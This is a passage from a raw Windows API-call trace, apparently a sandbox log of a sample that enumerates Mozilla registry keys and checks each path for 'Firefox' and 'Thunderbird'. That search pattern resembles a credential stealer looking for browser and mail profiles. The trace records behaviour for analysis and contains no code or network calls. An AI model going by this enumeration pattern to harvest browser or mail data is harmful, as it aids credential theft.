lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\", lpString2="0" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0" [0160.275] VirtualQuery (in: lpAddress=0x2b16b0, lpBuffer=0x1bf860, dwLength=0x30 | out: lpBuffer=0x1bf860*(BaseAddress=0x2b1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.275] GetProcessHeap () returned 0x270000 [0160.275] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b16b0 | out: hHeap=0x270000) returned 1 [0160.275] StrStrIW (lpFirst="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0", lpSrch="Firefox") returned 0x0 [0160.275] GetProcessHeap () returned 0x270000 [0160.275] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b17f0 [0160.275] RegOpenKeyW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0", phkResult=0x1bf8d8 | out: phkResult=0x1bf8d8*=0xf8) returned 0x0 [0160.275] RegEnumKeyExW (in: hKey=0xf8, dwIndex=0x0, lpName=0x2b17f0, lpcchName=0x1bf8d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1bf8d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.275] RegCloseKey (hKey=0xf8) returned 0x0 [0160.275] VirtualQuery (in: lpAddress=0x2b17f0, lpBuffer=0x1bf820, dwLength=0x30 | out: lpBuffer=0x1bf820*(BaseAddress=0x2b1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.275] GetProcessHeap () returned 0x270000 [0160.275] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b17f0 | out: hHeap=0x270000) returned 1 [0160.275] VirtualQuery (in: lpAddress=0x2b1750, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.275] GetProcessHeap () returned 0x270000 [0160.275] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b1750 | out: hHeap=0x270000) returned 1 [0160.275] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x1, lpName=0x2b06a0, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="0", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.275] RegCloseKey (hKey=0xf4) returned 0x0 [0160.275] VirtualQuery (in: lpAddress=0x2b06a0, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.275] GetProcessHeap () returned 0x270000 [0160.275] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b06a0 | out: hHeap=0x270000) returned 1 [0160.275] VirtualQuery (in: lpAddress=0x2b0600, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.275] GetProcessHeap () returned 0x270000 [0160.275] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b0600 | out: hHeap=0x270000) returned 1 [0160.275] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x1, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="965b7fc26dad90d340d2fa0a4879039f", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.275] RegCloseKey (hKey=0xf0) returned 0x0 [0160.275] VirtualQuery (in: lpAddress=0x2af590, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2af000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.275] GetProcessHeap () returned 0x270000 [0160.275] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2af590 | out: hHeap=0x270000) returned 1 [0160.276] VirtualQuery (in: lpAddress=0x2a1d60, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2a1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x12000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.276] GetProcessHeap () returned 0x270000 [0160.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d60 | out: hHeap=0x270000) returned 1 [0160.276] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x1, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MaintenanceService", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.276] RegCloseKey (hKey=0xec) returned 0x0 [0160.276] VirtualQuery (in: lpAddress=0x2ae580, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2ae000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.276] GetProcessHeap () returned 0x270000 [0160.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ae580 | out: hHeap=0x270000) returned 1 [0160.276] CMemStm::Seek () returned 0x0 [0160.276] CMemStm::SetSize () returned 0x0 [0160.276] CMemStm::Seek () returned 0x0 [0160.276] CMemStm::Seek () returned 0x0 [0160.276] CMemStm::Seek () returned 0x0 [0160.276] CMemStm::Write () returned 0x0 [0160.276] CMemStm::Write () returned 0x0 [0160.276] CMemStm::Write () returned 0x0 [0160.276] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Thunderbird") returned 0x0 [0160.276] GetProcessHeap () returned 0x270000 [0160.276] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2ae580 [0160.276] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla", phkResult=0x1bfa28 | out: phkResult=0x1bfa28*=0xec) returned 0x0 [0160.276] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x0, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.276] lstrlenW (lpString="Software\\Mozilla") returned 16 [0160.276] lstrlenW (lpString="\\") returned 1 [0160.276] GetProcessHeap () returned 0x270000 [0160.276] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x29b8f0 [0160.276] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0160.276] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.276] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0160.276] lstrlenW (lpString="Firefox") returned 7 [0160.276] GetProcessHeap () returned 0x270000 [0160.276] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x32) returned 0x2a3650 [0160.277] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.277] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.277] VirtualQuery (in: lpAddress=0x29b8f0, lpBuffer=0x1bf940, dwLength=0x30 | out: lpBuffer=0x1bf940*(BaseAddress=0x29b000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.277] GetProcessHeap () returned 0x270000 [0160.277] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29b8f0 | out: hHeap=0x270000) returned 1 [0160.277] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Thunderbird") returned 0x0 [0160.277] GetProcessHeap () returned 0x270000 [0160.277] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2af590 [0160.277] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x1bf9b8 | out: phkResult=0x1bf9b8*=0xf0) returned 0x0 [0160.277] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x0, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Crash Reporter", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.277] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0160.277] lstrlenW (lpString="\\") returned 1 [0160.277] GetProcessHeap () returned 0x270000 [0160.277] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x34) returned 0x2a3690 [0160.277] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.277] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.277] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0160.277] lstrlenW (lpString="Crash Reporter") returned 14 [0160.277] GetProcessHeap () returned 0x270000 [0160.277] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x50) returned 0x2b05a0 [0160.277] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.277] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="Crash Reporter" | out: lpString1="Software\\Mozilla\\Firefox\\Crash Reporter") returned="Software\\Mozilla\\Firefox\\Crash Reporter" [0160.277] VirtualQuery (in: lpAddress=0x2a3690, lpBuffer=0x1bf8d0, dwLength=0x30 | out: lpBuffer=0x1bf8d0*(BaseAddress=0x2a3000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.277] GetProcessHeap () returned 0x270000 [0160.277] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a3690 | out: hHeap=0x270000) returned 1 [0160.277] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\Crash Reporter", lpSrch="Thunderbird") returned 0x0 [0160.277] GetProcessHeap () returned 0x270000 [0160.277] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b0600 [0160.277] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", phkResult=0x1bf948 | out: phkResult=0x1bf948*=0xf4) returned 0x0 [0160.277] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x0, lpName=0x2b0600, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.277] RegCloseKey (hKey=0xf4) returned 0x0 [0160.278] VirtualQuery (in: lpAddress=0x2b0600, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.278] GetProcessHeap () returned 0x270000 [0160.278] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b0600 | out: hHeap=0x270000) returned 1 [0160.278] VirtualQuery (in: lpAddress=0x2b05a0, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.278] GetProcessHeap () returned 0x270000 [0160.278] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b05a0 | out: hHeap=0x270000) returned 1 [0160.278] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x1, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.278] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0160.278] lstrlenW (lpString="\\") returned 1 [0160.278] GetProcessHeap () returned 0x270000 [0160.278] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x34) returned 0x2a3690 [0160.278] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.278] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.278] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0160.278] lstrlenW (lpString="TaskBarIDs") returned 10 [0160.278] GetProcessHeap () returned 0x270000 [0160.278] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x2a1d60 [0160.278] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.278] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="TaskBarIDs" | out: lpString1="Software\\Mozilla\\Firefox\\TaskBarIDs") returned="Software\\Mozilla\\Firefox\\TaskBarIDs" [0160.278] VirtualQuery (in: lpAddress=0x2a3690, lpBuffer=0x1bf8d0, dwLength=0x30 | out: lpBuffer=0x1bf8d0*(BaseAddress=0x2a3000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.278] GetProcessHeap () returned 0x270000 [0160.278] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a3690 | out: hHeap=0x270000) returned 1 [0160.278] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Thunderbird") returned 0x0 [0160.278] GetProcessHeap () returned 0x270000 [0160.278] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b05a0 [0160.278] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x1bf948 | out: phkResult=0x1bf948*=0xf4) returned 0x0 [0160.278] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x0, lpName=0x2b05a0, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.278] RegCloseKey (hKey=0xf4) returned 0x0 [0160.278] VirtualQuery (in: lpAddress=0x2b05a0, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.278] GetProcessHeap () returned 0x270000 [0160.278] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b05a0 | out: hHeap=0x270000) returned 1 [0160.279] VirtualQuery (in: lpAddress=0x2a1d60, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2a1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x12000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.279] GetProcessHeap () returned 0x270000 [0160.279] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d60 | out: hHeap=0x270000) returned 1 [0160.279] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x2, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.279] RegCloseKey (hKey=0xf0) returned 0x0 [0160.279] VirtualQuery (in: lpAddress=0x2af590, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2af000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.279] GetProcessHeap () returned 0x270000 [0160.279] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2af590 | out: hHeap=0x270000) returned 1 [0160.279] VirtualQuery (in: lpAddress=0x2a3650, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2a3000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.279] GetProcessHeap () returned 0x270000 [0160.279] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a3650 | out: hHeap=0x270000) returned 1 [0160.279] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x1, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.279] RegCloseKey (hKey=0xec) returned 0x0 [0160.279] VirtualQuery (in: lpAddress=0x2ae580, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2ae000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.279] GetProcessHeap () returned 0x270000 [0160.279] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ae580 | out: hHeap=0x270000) returned 1 [0160.279] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Thunderbird") returned 0x0 [0160.279] GetProcessHeap () returned 0x270000 [0160.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2ae580 [0160.279] RegOpenKeyW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla", phkResult=0x1bfa28 | out: phkResult=0x1bfa28*=0xec) returned 0x0 [0160.279] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x0, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MaintenanceService", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.279] lstrlenW (lpString="Software\\Mozilla") returned 16 [0160.279] lstrlenW (lpString="\\") returned 1 [0160.279] GetProcessHeap () returned 0x270000 [0160.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x29b8f0 [0160.279] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0160.279] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.279] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0160.279] lstrlenW (lpString="MaintenanceService") returned 18 [0160.279] GetProcessHeap () returned 0x270000 [0160.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x2a1d60 [0160.280] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.280] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="MaintenanceService" | out: lpString1="Software\\Mozilla\\MaintenanceService") returned="Software\\Mozilla\\MaintenanceService" [0160.280] VirtualQuery (in: lpAddress=0x29b8f0, lpBuffer=0x1bf940, dwLength=0x30 | out: lpBuffer=0x1bf940*(BaseAddress=0x29b000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.280] GetProcessHeap () returned 0x270000 [0160.280] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29b8f0 | out: hHeap=0x270000) returned 1 [0160.280] StrStrIW (lpFirst="Software\\Mozilla\\MaintenanceService", lpSrch="Thunderbird") returned 0x0 [0160.280] GetProcessHeap () returned 0x270000 [0160.280] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2af590 [0160.280] RegOpenKeyW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\MaintenanceService", phkResult=0x1bf9b8 | out: phkResult=0x1bf9b8*=0xf0) returned 0x0 [0160.280] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x0, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="965b7fc26dad90d340d2fa0a4879039f", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.280] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService") returned 35 [0160.280] lstrlenW (lpString="\\") returned 1 [0160.280] GetProcessHeap () returned 0x270000 [0160.280] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4a) returned 0x2b05a0 [0160.280] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService" | out: lpString1="Software\\Mozilla\\MaintenanceService") returned="Software\\Mozilla\\MaintenanceService" [0160.280] lstrcatW (in: lpString1="Software\\Mozilla\\MaintenanceService", lpString2="\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\") returned="Software\\Mozilla\\MaintenanceService\\" [0160.280] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService\\") returned 36 [0160.280] lstrlenW (lpString="965b7fc26dad90d340d2fa0a4879039f") returned 32 [0160.280] GetProcessHeap () returned 0x270000 [0160.280] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8a) returned 0x2b0600 [0160.280] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\") returned="Software\\Mozilla\\MaintenanceService\\" [0160.280] lstrcatW (in: lpString1="Software\\Mozilla\\MaintenanceService\\", lpString2="965b7fc26dad90d340d2fa0a4879039f" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f" [0160.280] VirtualQuery (in: lpAddress=0x2b05a0, lpBuffer=0x1bf8d0, dwLength=0x30 | out: lpBuffer=0x1bf8d0*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.280] GetProcessHeap () returned 0x270000 [0160.280] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b05a0 | out: hHeap=0x270000) returned 1 [0160.280] StrStrIW (lpFirst="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f", lpSrch="Thunderbird") returned 0x0 [0160.280] GetProcessHeap () returned 0x270000 [0160.280] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b06a0 [0160.280] RegOpenKeyW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f", phkResult=0x1bf948 | out: phkResult=0x1bf948*=0xf4) returned 0x0 [0160.280] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x0, lpName=0x2b06a0, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="0", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.281] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f") returned 68 [0160.281] lstrlenW (lpString="\\") returned 1 [0160.281] GetProcessHeap () returned 0x270000 [0160.281] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8c) returned 0x2b16b0 [0160.281] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f" [0160.281] lstrcatW (in: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f", lpString2="\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\" [0160.281] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\") returned 69 [0160.281] lstrlenW (lpString="0") returned 1 [0160.281] GetProcessHeap () returned 0x270000 [0160.281] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8e) returned 0x2b1750 [0160.281] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\" [0160.281] lstrcatW (in: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\", lpString2="0" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0" [0160.281] VirtualQuery (in: lpAddress=0x2b16b0, lpBuffer=0x1bf860, dwLength=0x30 | out: lpBuffer=0x1bf860*(BaseAddress=0x2b1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.281] GetProcessHeap () returned 0x270000 [0160.281] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b16b0 | out: hHeap=0x270000) returned 1 [0160.281] StrStrIW (lpFirst="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0", lpSrch="Thunderbird") returned 0x0 [0160.281] GetProcessHeap () returned 0x270000 [0160.281] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b17f0 [0160.281] RegOpenKeyW (in: 